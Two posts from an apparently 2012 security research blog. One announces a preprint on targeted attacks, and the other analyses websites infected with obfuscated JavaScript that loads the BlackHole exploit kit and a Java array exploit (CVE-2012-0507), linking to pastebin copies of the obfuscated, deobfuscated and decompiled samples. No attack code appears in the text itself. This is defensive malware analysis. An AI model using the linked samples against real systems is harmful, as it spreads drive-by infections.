Monday, July 2, 2012

IEEE Security and Privacy (PrePrint) - Targeted Cyber Attacks - A Superset of APTs

Our paper on "Targeted Cyber Attacks - A Superset of Advanced Persistent Threats" is available in preprint  at:

http://www.computer.org/csdl/mags/sp/preprint/msp2012990114-abs.html 

Abstract - Cybercrime increasingly impacts the online world, and targeted attacks are playing a significant role in disrupting the online social and economic model. In addition, nations are facing threats as a result of targeted attacks. In this paper we examine a variety of components and techniques that are brought together to bring about targeted attacks.

I will update the details once it is published as a part of hard copy.

Sunday, July 1, 2012

BlackHole + Java Array Exploit - Rising High

During our analysis, we have seen that several of the websites have been infected with obfuscated JavaScripts that point to one or the other Browser Exploit Pack (BEP). Typically, BlackHole is the primary weapon for automated infections using Drive-by-download attacks. Recently, another high traffic website is found to be running malicious script that is loading BlackHole to trigger infection.

Java array exploit is on rise nowadays. Microsoft has discussed about the details of this vulnerability at: http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx.

The obfuscated script is present here - http://pastebin.com/nVQcmMsM. The script deobfuscates to the following code as follows:


The URL's are designed to use no-ip or dynamic dns service. According to Wikipedia, "Dynamic DNS or DDNS is a method of updating, in real time, a Domain Name System (DNS) to point to a changing IP address on the Internet. This is used to provide a persistent domain name for a resource that may change location on the network."

We mapped the required IP and doing some behavioral analysis, a plugin detection script was found as present on the following lnk:

Obuscated Code - http://pastebin.com/rK0NaAMh.
Deobfuscated Plugin Detection code - http://pastebin.com/QxiXVRcG

The code fingerprints the browser for running different set of plugins. On finding the vulnerable version of Java plugin, the script downloads the malicious jar file running specific Java exploit.


The decompiled code is present here: http://pastebin.com/5FWMUEtP

Java exploits have become popular. We have also discussed earlier about top 5 Java exploits here: http://secniche.blogspot.com/2011/05/finest-5-java-exploit-on-fire.html.

Java array indexing vulnerability is the new kid in the town. Refer vulnerability - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507.